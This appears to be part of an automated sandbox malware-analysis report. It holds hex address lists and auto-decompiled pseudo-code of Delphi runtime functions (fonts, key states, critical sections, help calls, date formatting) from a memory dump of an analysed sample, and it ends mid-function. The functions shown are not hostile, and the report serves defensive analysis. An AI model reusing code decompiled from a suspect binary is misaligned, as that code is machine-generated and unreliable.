                                                    0x00478513
                                                    0x00478519
                                                    0x00478533
                                                    0x00478537
                                                    0x004785ad
                                                    0x004785af
                                                    0x004785f6
                                                    0x004785fa
                                                    0x00478675
                                                    0x0047867f
                                                    0x00478682
                                                    0x00478686
                                                    0x00478688
                                                    0x0047868c
                                                    0x0047868e
                                                    0x0047868e
                                                    0x0047868e
                                                    0x0047869a
                                                    0x0047869a
                                                    0x0047868c
                                                    0x004785fc
                                                    0x004785ff
                                                    0x00478604
                                                    0x00478644
                                                    0x0047864c
                                                    0x00478654
                                                    0x0047865a
                                                    0x0047865d
                                                    0x00478666
                                                    0x00478669
                                                    0x00478606
                                                    0x00478610
                                                    0x00478621
                                                    0x00478628
                                                    0x0047862e
                                                    0x0047863c
                                                    0x0047863f
                                                    0x0047863f
                                                    0x00478604
                                                    0x00000000
                                                    0x004785fa
                                                    0x004785b1
                                                    0x004785b5
                                                    0x004785bc
                                                    0x004785c1
                                                    0x004785cf
                                                    0x004785d4
                                                    0x004785d4
                                                    0x004785c1
                                                    0x004785e4
                                                    0x004785ee
                                                    0x00000000
                                                    0x00478539
                                                    0x00478543
                                                    0x00478546
                                                    0x00478548
                                                    0x00478587
                                                    0x0047858c
                                                    0x0047858e
                                                    0x00478594
                                                    0x004785a2
                                                    0x0047854a
                                                    0x00478559
                                                    0x00478563
                                                    0x00478569
                                                    0x00478575
                                                    0x00478575
                                                    0x004785a5
                                                    0x0047869d
                                                    0x0047869d
                                                    0x0047869d
                                                    0x0047869d
                                                    0x00000000
                                                    0x0047869d
                                                    0x0047851b
                                                    0x0047851e
                                                    0x00478527
                                                    0x00478527
                                                    0x004786a1
                                                    0x004786a1
                                                    0x004786a2
                                                    0x00000000
                                                    0x004784fd

                                                    APIs
                                                    • SysFreeString.OLEAUT32(?), ref: 00478782
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeString
                                                    • String ID: <~G$H
                                                    • API String ID: 3341692771-3576284788
                                                    • Opcode ID: 22663e01971d2a1c8f067ade5d69fd3c52a2dadb3113bc62c40a76bf787e1113
                                                    • Instruction ID: b8f1c08bed6d2714fac9d526e07dd471d665f945914cf58d975e5e29605529f8
                                                    • Opcode Fuzzy Hash: 22663e01971d2a1c8f067ade5d69fd3c52a2dadb3113bc62c40a76bf787e1113
                                                    • Instruction Fuzzy Hash: E7B1F8B4A006099FDB14CF99C884AAEB7F1FF49314F20C56AE909AB351D738AD41CF64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00402188 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00401A9C: RtlInitializeCriticalSection.KERNEL32(0049E5CC,00000000,',?,?,00402336,03030000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AB2
                                                      • Part of subcall function 00401A9C: RtlEnterCriticalSection.KERNEL32(0049E5CC,0049E5CC,00000000,',?,?,00402336,03030000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AC5
                                                      • Part of subcall function 00401A9C: LocalAlloc.KERNEL32(00000000,00000FF8,0049E5CC,00000000,',?,?,00402336,03030000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AEF
                                                      • Part of subcall function 00401A9C: RtlLeaveCriticalSection.KERNEL32(0049E5CC,00401B59,00000000,',?,?,00402336,03030000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401B4C
                                                    • RtlEnterCriticalSection.KERNEL32(0049E5CC,00000000,7 ), ref: 004021D3
                                                    • RtlLeaveCriticalSection.KERNEL32(0049E5CC,0040230B), ref: 004022FE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                    • String ID: 7
                                                    • API String ID: 2227675388-1331172448
                                                    • Opcode ID: 9a78f7d3737335b21edd66d81c52318f9676be8a12604ca817311499b46f933e
                                                    • Instruction ID: 4af8bea66c2055acf7768281f877aa53f35be4b0bc747d0b7dec25e4a478ddf4
                                                    • Opcode Fuzzy Hash: 9a78f7d3737335b21edd66d81c52318f9676be8a12604ca817311499b46f933e
                                                    • Instruction Fuzzy Hash: 8441E2B1A04200DFD715CFAADE9562977E0FB68328B6542BFD401E77E1E2799C41CB08
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00424E24 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 123COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 80%
                                                    			E00424E24(void* __eax, void* __ebx, void* __ecx) {
				signed int _v8;
				struct tagLOGFONTA _v68;
				char _v72;
				char _v76;
				char _v80;
				intOrPtr _t76;
				intOrPtr _t81;
				void* _t100;
				void* _t107;
				void* _t116;
				intOrPtr _t126;
				void* _t137;
				void* _t138;
				intOrPtr _t139;

				_t137 = _t138;
				_t139 = _t138 + 0xffffffb4;
				_v80 = 0;
				_v76 = 0;
				_v72 = 0;
				_t116 = __eax;
				_push(_t137);
				_push(0x424fad);
				_push( *[fs:eax]);
				 *[fs:eax] = _t139;
				_v8 =  *((intOrPtr*)(__eax + 0x10));
				if( *((intOrPtr*)(_v8 + 8)) != 0) {
					__eflags = 0;
					 *[fs:eax] = 0;
					_push(0x424fb4);
					return E004049E4( &_v80, 3);
				} else {
					_t76 =  *0x49e8e0; // 0x3030a30
					E00424168(_t76);
					_push(_t137);
					_push(0x424f85);
					_push( *[fs:eax]);
					 *[fs:eax] = _t139;
					if( *((intOrPtr*)(_v8 + 8)) == 0) {
						_v68.lfHeight =  *(_v8 + 0x14);
						_v68.lfWidth = 0;
						_v68.lfEscapement = 0;
						_v68.lfOrientation = 0;
						if(( *(_v8 + 0x19) & 0x00000001) == 0) {
							_v68.lfWeight = 0x190;
						} else {
							_v68.lfWeight = 0x2bc;
						}
						_v68.lfItalic = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000002) != 0x00000000;
						_v68.lfUnderline = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000004) != 0x00000000;
						_v68.lfStrikeOut = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000008) != 0x00000000;
						_v68.lfCharSet =  *((intOrPtr*)(_v8 + 0x1a));
						E00404C24( &_v72, _v8 + 0x1b,  *(_v8 + 0x19) & 0x00000008);
						_t100 = E00408F88(_v72, "Default");
						_t146 = _t100;
						if(_t100 != 0) {
							__eflags = _v8 + 0x1b;
							E00404C24( &_v80, _v8 + 0x1b, _v8 + 0x1b);
							E0040A020( &(_v68.lfFaceName), _v80);
						} else {
							E00404C24( &_v76, "\rMS Sans Serif", _t146);
							E0040A020( &(_v68.lfFaceName), _v76);
						}
						_v68.lfQuality = 0;
						_v68.lfOutPrecision = 0;
						_v68.lfClipPrecision = 0;
						_t107 = E00425108(_t116) - 1;
						if(_t107 == 0) {
							_v68.lfPitchAndFamily = 2;
						} else {
							if(_t107 == 1) {
								_v68.lfPitchAndFamily = 1;
							} else {
								_v68.lfPitchAndFamily = 0;
							}
						}
						 *((intOrPtr*)(_v8 + 8)) = CreateFontIndirectA( &_v68);
					}
					_pop(_t126);
					 *[fs:eax] = _t126;
					_push(0x424f8c);
					_t81 =  *0x49e8e0; // 0x3030a30
					return E00424174(_t81);
				}
			}

















                                                    0x00424e25
                                                    0x00424e27
                                                    0x00424e2d
                                                    0x00424e30
                                                    0x00424e33
                                                    0x00424e36
                                                    0x00424e3a
                                                    0x00424e3b
                                                    0x00424e40
                                                    0x00424e43
                                                    0x00424e49
                                                    0x00424e53
                                                    0x00424f92
                                                    0x00424f97
                                                    0x00424f9a
                                                    0x00424fac
                                                    0x00424e59
                                                    0x00424e59
                                                    0x00424e5e
                                                    0x00424e65
                                                    0x00424e66
                                                    0x00424e6b
                                                    0x00424e6e
                                                    0x00424e78
                                                    0x00424e84
                                                    0x00424e89
                                                    0x00424e8e
                                                    0x00424e93
                                                    0x00424e9d
                                                    0x00424ea8
                                                    0x00424e9f
                                                    0x00424e9f
                                                    0x00424e9f
                                                    0x00424eb9
                                                    0x00424ec6
                                                    0x00424ed3
                                                    0x00424edc
                                                    0x00424ee8
                                                    0x00424ef5
                                                    0x00424efa
                                                    0x00424efc
                                                    0x00424f1e
                                                    0x00424f21
                                                    0x00424f2c
                                                    0x00424efe
                                                    0x00424f06
                                                    0x00424f11
                                                    0x00424f11
                                                    0x00424f31
                                                    0x00424f35
                                                    0x00424f39
                                                    0x00424f44
                                                    0x00424f46
                                                    0x00424f4e
                                                    0x00424f48
                                                    0x00424f4a
                                                    0x00424f54
                                                    0x00424f4c
                                                    0x00424f5a
                                                    0x00424f5a
                                                    0x00424f4a
                                                    0x00424f6a
                                                    0x00424f6a
                                                    0x00424f6f
                                                    0x00424f72
                                                    0x00424f75
                                                    0x00424f7a
                                                    0x00424f84
                                                    0x00424f84

                                                    APIs
                                                      • Part of subcall function 00424168: RtlEnterCriticalSection.KERNEL32(?,004241A5), ref: 0042416C
                                                    • CreateFontIndirectA.GDI32(?), ref: 00424F62
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateCriticalEnterFontIndirectSection
                                                    • String ID: MS Sans Serif$Default
                                                    • API String ID: 2931345757-2137701257
                                                    • Opcode ID: 89d54db4af104641d8e73ec6089c9fc87516c81d3827a31575630f39306a7239
                                                    • Instruction ID: b3d76d3ca7c544b37bc71fdcf573607e07253616adc25b4daf7a036753d91774
                                                    • Opcode Fuzzy Hash: 89d54db4af104641d8e73ec6089c9fc87516c81d3827a31575630f39306a7239
                                                    • Instruction Fuzzy Hash: 16517F31B04258DFDB01DFA4D641B8DBBF6EF88304FA640AAE804A7352D3389E05DB59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040D5A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 86%
                                                    			E0040D5A0(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				char _v297;
				char _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				char _v320;
				intOrPtr _v324;
				char _v328;
				void* _v332;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				intOrPtr _v352;
				char _v356;
				char _v360;
				char _v364;
				void* _v368;
				char _v372;
				intOrPtr _t52;
				intOrPtr _t60;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t89;
				intOrPtr _t101;
				void* _t108;
				intOrPtr _t110;
				void* _t113;

				_t108 = __edi;
				_v372 = 0;
				_v336 = 0;
				_v344 = 0;
				_v340 = 0;
				_v8 = 0;
				_push(_t113);
				_push(0x40d75b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xfffffe90;
				_t89 =  *((intOrPtr*)(_a4 - 4));
				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
					_t52 =  *0x49dbd4; // 0x407ddc
					E00406A70(_t52,  &_v8);
				} else {
					_t86 =  *0x49de48; // 0x407dd4
					E00406A70(_t86,  &_v8);
				}
				_t110 =  *((intOrPtr*)(_t89 + 0x18));
				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
					_v368 =  *(_t89 + 0xc);
					_v364 = 5;
					_v360 = _v8;
					_v356 = 0xb;
					_v352 = _t110;
					_v348 = 5;
					_t60 =  *0x49dbfc; // 0x407d7c
					E00406A70(_t60,  &_v372);
					E0040D180(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
				} else {
					_v332 =  *(_t89 + 0xc);
					_v328 = 5;
					E00404C30( &_v340, 0x105,  &_v297);
					L00409E18(_v340,  &_v336);
					_v324 = _v336;
					_v320 = 0xb;
					_v316 = _v8;
					_v312 = 0xb;
					_v308 = _t110;
					_v304 = 5;
					_t82 =  *0x49dcbc; // 0x407e84
					E00406A70(_t82,  &_v344);
					E0040D180(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
				}
				_pop(_t101);
				 *[fs:eax] = _t101;
				_push(E0040D762);
				E004049C0( &_v372);
				E004049E4( &_v344, 3);
				return E004049C0( &_v8);
			}

































                                                    0x0040d5a0
                                                    0x0040d5ad
                                                    0x0040d5b3
                                                    0x0040d5b9
                                                    0x0040d5bf
                                                    0x0040d5c5
                                                    0x0040d5ca
                                                    0x0040d5cb
                                                    0x0040d5d0
                                                    0x0040d5d3
                                                    0x0040d5d9
                                                    0x0040d5e0
                                                    0x0040d5f4
                                                    0x0040d5f9
                                                    0x0040d5e2
                                                    0x0040d5e5
                                                    0x0040d5ea
                                                    0x0040d5ea
                                                    0x0040d5fe
                                                    0x0040d60b
                                                    0x0040d617
                                                    0x0040d6d3
                                                    0x0040d6d9
                                                    0x0040d6e3
                                                    0x0040d6e9
                                                    0x0040d6f0
                                                    0x0040d6f6
                                                    0x0040d70c
                                                    0x0040d711
                                                    0x0040d723
                                                    0x0040d63a
                                                    0x0040d63d
                                                    0x0040d643
                                                    0x0040d65b
                                                    0x0040d66c
                                                    0x0040d677
                                                    0x0040d67d
                                                    0x0040d687
                                                    0x0040d68d
                                                    0x0040d694
                                                    0x0040d69a
                                                    0x0040d6b0
                                                    0x0040d6b5
                                                    0x0040d6c7
                                                    0x0040d6cc
                                                    0x0040d72c
                                                    0x0040d72f
                                                    0x0040d732
                                                    0x0040d73d
                                                    0x0040d74d
                                                    0x0040d75a

                                                    APIs
                                                    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040D75B), ref: 0040D60B
                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040D75B), ref: 0040D62D
                                                      • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileLoadModuleNameQueryStringVirtual
                                                    • String ID: |}@
                                                    • API String ID: 902310565-1323765261
                                                    • Opcode ID: 25be1960f6db36998ca4914cfa2c85f29290a83f72f346ca75a33df59a24262f
                                                    • Instruction ID: 969e10bc4ad112e79de870a84619b0299ea79aa46f8ff725eca5e2ac65c0a227
                                                    • Opcode Fuzzy Hash: 25be1960f6db36998ca4914cfa2c85f29290a83f72f346ca75a33df59a24262f
                                                    • Instruction Fuzzy Hash: 41410470D00618DFDB21DF65CC81BDAB7B4AB49304F4041FAE508AB291D778AE88CF95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044E02C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84keyboardCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 72%
                                                    			E0044E02C(intOrPtr __eax, void* __edx) {
				char _v8;
				signed short _v10;
				intOrPtr _v16;
				char _v17;
				char _v24;
				intOrPtr _t34;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t48;
				void* _t51;
				intOrPtr _t64;
				intOrPtr _t67;
				void* _t69;
				void* _t71;
				intOrPtr _t72;

				_t69 = _t71;
				_t72 = _t71 + 0xffffffec;
				_t51 = __edx;
				_v16 = __eax;
				_v10 =  *((intOrPtr*)(__edx + 4));
				if(_v10 == 0) {
					return 0;
				} else {
					if(GetKeyState(0x10) < 0) {
						_v10 = _v10 + 0x2000;
					}
					if(GetKeyState(0x11) < 0) {
						_v10 = _v10 + 0x4000;
					}
					if(( *(_t51 + 0xb) & 0x00000020) != 0) {
						_v10 = _v10 + 0x8000;
					}
					_v24 =  *((intOrPtr*)(_v16 + 0x34));
					_t34 =  *0x49ebac; // 0x3030da8
					E0042C30C(_t34,  &_v24);
					_push(_t69);
					_push(0x44e12a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t72;
					while(1) {
						_v17 = 0;
						_v8 = L0044DD30(_v16, 2, _v10 & 0x0000ffff);
						if(_v8 != 0) {
							break;
						}
						if(_v24 == 0 || _v17 != 2) {
							_pop(_t64);
							 *[fs:eax] = _t64;
							_push(0x44e131);
							_t40 =  *0x49ebac; // 0x3030da8
							return E0042C304(_t40);
						} else {
							continue;
						}
						goto L14;
					}
					_t42 =  *0x49ebac; // 0x3030da8
					E0042C30C(_t42,  &_v8);
					_push(_t69);
					_push(0x44e0ff);
					_push( *[fs:eax]);
					 *[fs:eax] = _t72;
					_v17 = L0044DED8( &_v8, 0, _t69);
					_pop(_t67);
					 *[fs:eax] = _t67;
					_push(0x44e106);
					_t48 =  *0x49ebac; // 0x3030da8
					return E0042C304(_t48);
				}
				L14:
			}


















                                                    0x0044e02d
                                                    0x0044e02f
                                                    0x0044e033
                                                    0x0044e035
                                                    0x0044e03f
                                                    0x0044e048
                                                    0x0044e147
                                                    0x0044e04e
                                                    0x0044e058
                                                    0x0044e05a
                                                    0x0044e05a
                                                    0x0044e06a
                                                    0x0044e06c
                                                    0x0044e06c
                                                    0x0044e076
                                                    0x0044e078
                                                    0x0044e078
                                                    0x0044e084
                                                    0x0044e08a
                                                    0x0044e08f
                                                    0x0044e096
                                                    0x0044e097
                                                    0x0044e09c
                                                    0x0044e09f
                                                    0x0044e0a2
                                                    0x0044e0a2
                                                    0x0044e0b4
                                                    0x0044e0bb
                                                    0x00000000
                                                    0x00000000
                                                    0x0044e10a
                                                    0x0044e114
                                                    0x0044e117
                                                    0x0044e11a
                                                    0x0044e11f
                                                    0x0044e129
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0044e10a
                                                    0x0044e0c0
                                                    0x0044e0c5
                                                    0x0044e0cc
                                                    0x0044e0cd
                                                    0x0044e0d2
                                                    0x0044e0d5
                                                    0x0044e0e4
                                                    0x0044e0e9
                                                    0x0044e0ec
                                                    0x0044e0ef
                                                    0x0044e0f4
                                                    0x0044e0fe
                                                    0x0044e0fe
                                                    0x00000000

                                                    APIs
                                                    • GetKeyState.USER32(00000010), ref: 0044E050
                                                    • GetKeyState.USER32(00000011), ref: 0044E062
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: State
                                                    • String ID:
                                                    • API String ID: 1649606143-3916222277
                                                    • Opcode ID: 44b487c12f32330f0e2b631a448e4c074bb6be9e776f131d9141241d4ae5a6fd
                                                    • Instruction ID: dd991a499b8bdb83682dc26b7e7e078d12a516ef0c40e0bf5f2210f7bad781b1
                                                    • Opcode Fuzzy Hash: 44b487c12f32330f0e2b631a448e4c074bb6be9e776f131d9141241d4ae5a6fd
                                                    • Instruction Fuzzy Hash: D231F731A04218AFEB11DFA6E84179EB7F5FB48314F50C4BBEC00A6291E77C5A00D668
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004354E8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 76%
                                                    			E004354E8(void* __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				void* _t33;
				long _t46;
				CHAR* _t48;
				void* _t55;
				intOrPtr _t67;
				void* _t74;
				char _t76;
				void* _t79;

				_t74 = __edi;
				_t78 = _t79;
				_push(__ebx);
				_push(__esi);
				_v32 = 0;
				_v8 = 0;
				_v12 = 0;
				_t76 = __edx;
				_t55 = __eax;
				_push(_t79);
				_push(0x4355e0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t79 + 0xffffffe4;
				_t81 = __edx;
				if(__edx == 0) {
					E0040D200(0x435088, 1);
					E00404378();
				}
				_v28 = _t76;
				_v24 = 0xb;
				E00435234(_t55, _t55,  &_v32, 0, _t74, _t76);
				_v20 = _v32;
				_v16 = 0xb;
				E0040A664("IE(AL(\"%s\",4),\"AL(\\\"%0:s\\\",3)\",\"JK(\\\"%1:s\\\",\\\"%0:s\\\")\")", 1,  &_v28,  &_v8);
				_t33 = L00435B78(_t55, _t74, _t78, _t81);
				_t82 = _t33;
				if(_t33 != 0) {
					E00435234(_t55, _t55,  &_v12, 0, _t74, _t76);
					if(L00435AD0(_t55, _t55, _v8, 1, _t76, _t82, 0) != 0 && _v12 != 0) {
						 *((char*)(_t55 + 0x10)) = 1;
						E00404A14(_t55 + 0x14, _v8);
						_t46 = E00404E80(_v8);
						_t48 = E00404E80(_v12);
						WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x1c)))) + 0xc))(), _t48, 0x102, _t46);
					}
				}
				_pop(_t67);
				 *[fs:eax] = _t67;
				_push(0x4355e7);
				E004049C0( &_v32);
				return E004049E4( &_v12, 2);
			}


















                                                    0x004354e8
                                                    0x004354e9
                                                    0x004354ee
                                                    0x004354ef
                                                    0x004354f2
                                                    0x004354f5
                                                    0x004354f8
                                                    0x004354fb
                                                    0x004354fd
                                                    0x00435501
                                                    0x00435502
                                                    0x00435507
                                                    0x0043550a
                                                    0x0043550d
                                                    0x0043550f
                                                    0x0043551d
                                                    0x00435522
                                                    0x00435522
                                                    0x0043552b
                                                    0x0043552e
                                                    0x00435539
                                                    0x00435541
                                                    0x00435544
                                                    0x00435555
                                                    0x0043555c
                                                    0x00435561
                                                    0x00435563
                                                    0x0043556c
                                                    0x00435581
                                                    0x00435589
                                                    0x00435593
                                                    0x0043559b
                                                    0x004355a9
                                                    0x004355b8
                                                    0x004355b8
                                                    0x00435581
                                                    0x004355bf
                                                    0x004355c2
                                                    0x004355c5
                                                    0x004355cd
                                                    0x004355df

                                                    APIs
                                                    Strings
                                                    • hI, xrefs: 00435511
                                                    • IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")"), xrefs: 00435550
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Help
                                                    • String ID: IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")$hI
                                                    • API String ID: 2830496658-455175267
                                                    • Opcode ID: 528680d23dcfaebcb708a0af9dd70d4af1887779c325f2a6ac742da8a25f82eb
                                                    • Instruction ID: ee1a8833f3819ee9826a6e87181a8fb7dc7e8b52fcd89467c6c2dda304d0cd71
                                                    • Opcode Fuzzy Hash: 528680d23dcfaebcb708a0af9dd70d4af1887779c325f2a6ac742da8a25f82eb
                                                    • Instruction Fuzzy Hash: BC3166B0A006049BDB04EFA5D885A9FB7B5AF4C304F51547EF900A7392D778AE05CB99
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0045AE50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81threadwindowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 67%
                                                    			E0045AE50(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v9;
				char _v16;
				char _v20;
				intOrPtr _t36;
				long _t41;
				intOrPtr _t52;
				intOrPtr _t66;
				intOrPtr* _t67;
				intOrPtr _t68;
				void* _t74;
				void* _t75;
				intOrPtr _t76;

				_t72 = __esi;
				_t71 = __edi;
				_t74 = _t75;
				_t76 = _t75 + 0xfffffff0;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 = 0;
				_v20 = 0;
				_v8 = __eax;
				_push(_t74);
				_push(0x45af60);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				_t56 = E0045ADD8(_v8);
				if( *((char*)(_v8 + 0x88)) != 0) {
					_t52 = _v8;
					_t79 =  *((intOrPtr*)(_t52 + 0x48));
					if( *((intOrPtr*)(_t52 + 0x48)) == 0) {
						E0045B3A8(_v8);
					}
				}
				E00458DF8(_t56,  &_v20);
				E004380E0(_v20, 0,  &_v16, _t79);
				_t36 =  *0x49ebb8; // 0x0
				E0045B010(_t36, _v16, _t79);
				_v9 = 1;
				_push(_t74);
				_push(0x45af07);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				if( *((short*)(_v8 + 0x102)) != 0) {
					_t56 = _v8;
					 *((intOrPtr*)(_v8 + 0x100))();
				}
				if(_v9 != 0) {
					E0045AD74();
				}
				_pop(_t66);
				 *[fs:eax] = _t66;
				_t41 = GetCurrentThreadId();
				_t67 =  *0x49de40; // 0x49e034
				if(_t41 ==  *_t67 && E004214B8(0, _t56, _t71, _t72) != 0) {
					_v9 = 0;
				}
				if(_v9 != 0) {
					WaitMessage();
				}
				_pop(_t68);
				 *[fs:eax] = _t68;
				_push(E0045AF67);
				return E004049E4( &_v20, 2);
			}
















                                                    0x0045ae50
                                                    0x0045ae50
                                                    0x0045ae51
                                                    0x0045ae53
                                                    0x0045ae56
                                                    0x0045ae57
                                                    0x0045ae58
                                                    0x0045ae5b
                                                    0x0045ae5e
                                                    0x0045ae61
                                                    0x0045ae66
                                                    0x0045ae67
                                                    0x0045ae6c
                                                    0x0045ae6f
                                                    0x0045ae7a
                                                    0x0045ae86
                                                    0x0045ae88
                                                    0x0045ae8b
                                                    0x0045ae8f
                                                    0x0045ae94
                                                    0x0045ae94
                                                    0x0045ae8f
                                                    0x0045ae9e
                                                    0x0045aea9
                                                    0x0045aeb1
                                                    0x0045aeb6
                                                    0x0045aebb
                                                    0x0045aec1
                                                    0x0045aec2
                                                    0x0045aec7
                                                    0x0045aeca
                                                    0x0045aed8
                                                    0x0045aedd
                                                    0x0045aee9
                                                    0x0045aee9
                                                    0x0045aef3
                                                    0x0045aef8
                                                    0x0045aef8
                                                    0x0045aeff
                                                    0x0045af02
                                                    0x0045af1c
                                                    0x0045af21
                                                    0x0045af29
                                                    0x0045af36
                                                    0x0045af36
                                                    0x0045af3e
                                                    0x0045af40
                                                    0x0045af40
                                                    0x0045af47
                                                    0x0045af4a
                                                    0x0045af4d
                                                    0x0045af5f

                                                    APIs
                                                      • Part of subcall function 0045ADD8: GetCursorPos.USER32 ref: 0045ADE1
                                                    • GetCurrentThreadId.KERNEL32 ref: 0045AF1C
                                                    • WaitMessage.USER32(00000000,0045AF60,?,?,?,0049ABD1), ref: 0045AF40
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CurrentCursorMessageThreadWait
                                                    • String ID: 4I
                                                    • API String ID: 535285469-2364942553
                                                    • Opcode ID: 1641b2bc43e08f655398654ef54c6e0fb99346d68cca38ad066637ff64216bef
                                                    • Instruction ID: 3d320c2a842818ba80bdb21166925b08477e9e3b0af4457c4c140f173818ef6e
                                                    • Opcode Fuzzy Hash: 1641b2bc43e08f655398654ef54c6e0fb99346d68cca38ad066637ff64216bef
                                                    • Instruction Fuzzy Hash: F431D670A04208EFDB01DF65C846BAEB7F5EB05305F6145BAEC00A7392D7796E58C71A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040B620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74threadCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 72%
                                                    			E0040B620(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				char _v280;
				char* _t32;
				intOrPtr* _t49;
				intOrPtr _t58;
				void* _t63;
				void* _t67;

				_v8 = 0;
				_t49 = __edx;
				_t63 = __eax;
				_push(_t67);
				_push(0x40b6fe);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffeec;
				E004049C0(__edx);
				_v24 =  *((intOrPtr*)(_a4 - 0xe));
				_v22 =  *((intOrPtr*)(_a4 - 0x10));
				_v18 =  *((intOrPtr*)(_a4 - 0x12));
				if(_t63 > 2) {
					E00404A58( &_v8, 0x40b720);
				} else {
					E00404A58( &_v8, 0x40b714);
				}
				_t32 = E00404E80(_v8);
				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
					E00404C30(_t49, 0x100,  &_v280);
